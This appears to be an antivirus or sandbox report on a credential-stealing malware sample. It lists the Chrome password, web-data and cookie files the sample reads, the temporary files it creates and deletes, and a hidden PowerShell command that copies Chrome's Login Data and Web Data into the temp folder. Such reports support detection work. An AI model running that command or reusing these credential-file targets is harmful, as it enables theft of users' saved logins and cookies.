Technical Information
Malicious functions
Reads files which store third party applications passwords
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
Modifies file system
Creates the following files
- %TEMP%\jtuonhs50yjlgdoaoyumvwi2.tmp
- %TEMP%\u2kn6tcdawte4gvek9slq4xvt1k85.sess
- %TEMP%\z0qjnfemaua1303700.tmp
- %TEMP%\vtskc8b90f1303700.tmp
- %TEMP%\hvmhea625g1303825.tmp
- %TEMP%\rdgftenvctw081303825.tmp
- %TEMP%\p4k9i6v6nh1304105.tmp
Deletes the following files
- %TEMP%\jtuonhs50yjlgdoaoyumvwi2.tmp
- %TEMP%\z0qjnfemaua1303700.tmp
- %TEMP%\hvmhea625g1303825.tmp
- %TEMP%\vtskc8b90f1303700.tmp
- %TEMP%\p4k9i6v6nh1304105.tmp
- %TEMP%\rdgftenvctw081303825.tmp
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%LOCALAPPDATA%\google\chrome\user data\default\Login Data\" \"%TEMP%\z0qjnfemaua1303700.tmp\" -Force;cpi \"%LOCALAPPDATA%\google\chrome\user data\default\Web Data\" \"%TEMP%\vtskc8b90f13...' (with hidden window)
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "cpi \"%LOCALAPPDATA%\google\chrome\user data\default\Login Data\" \"%TEMP%\z0qjnfemaua1303700.tmp\" -Force;cpi \"%LOCALAPPDATA%\google\chrome\user data\default\Web Data\" \"%TEMP%\vtskc8b90f13...
